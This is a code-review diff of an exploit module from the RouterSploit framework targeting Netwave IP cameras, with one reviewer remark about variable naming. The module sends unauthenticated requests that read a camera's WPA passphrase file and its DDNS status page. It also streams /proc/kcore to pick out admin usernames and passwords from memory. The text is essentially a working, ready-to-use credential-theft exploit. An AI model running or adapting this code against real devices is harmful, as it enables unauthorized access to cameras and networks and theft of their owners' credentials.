routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py

```diff
@@ -0,0 +1,83 @@
+        'description': 'This exploit will try to retrieve WPA password and ddns host name, '
+                       'Also it would try to read memory leak in order to find username and password',
+        'authors': [
+            'renos stoikos <rstoikos[at]gmail.com>',  # routesploit module
+            'spiritnull',  # exploit-db.com exploit
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/41236/',
+        ],
+        'devices': [
+            'Netwave IP Camera',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port', validators=validators.integer)  # default port
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
+            url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
+            url3 = "{}:{}//proc/kcore".format(self.target, self.port)
+
+            response = http_request(method="GET", url=url1)
+            if response is not None and "WPAPSK" in response.text:
+                print_success("WPA Password is in this text:")
+                print_info(response.text)
+            else:
+                print_error("Could not find WPA password")
+
+            print_info("Trying to gather more info")
+            response = http_request(method="GET", url=url2)
+            if response is not None and "ddns_host" in response.text:
+                print_success("ddns host name:")
+                print_info(response.text)
+            else:
+                print_error("could not read ddns host name")
+
+            print_status("Trying to find username and password from running memory leak")
+            print_status("This could take some time")
+            print_status("password is usually stuck next to 'admin' e.g admin123456")
+            response = http_request(method="GET", url=url3, stream=True)
+            try:
+                for chunk in response.iter_content(chunk_size=100):
+                    if "admin" in chunk:
+                        print_success(chunk)
+            except:
+                print_error("Exploit failed - could not read /proc/kcore")
+
+    @mute
+    def check(self):
+        url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
+        url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
+
+        response1 = http_request(method="GET", url=url1)
+        response2 = http_request(method="GET", url=url2)
+        if response1 and response2 is None:
+            return False  # target is not vulnerable
+
+        if response1.status_code == 200 and "WPAPSK" in response1.text or \
+           response2.status_code == 200 and "ddns" in response2.text:
+            return True  # target is vulnerable
+
+        return False  # target is not vulnerable
```

Comment:
Moreover, I would suggest to pick more suggestive name than `response1` and `response2`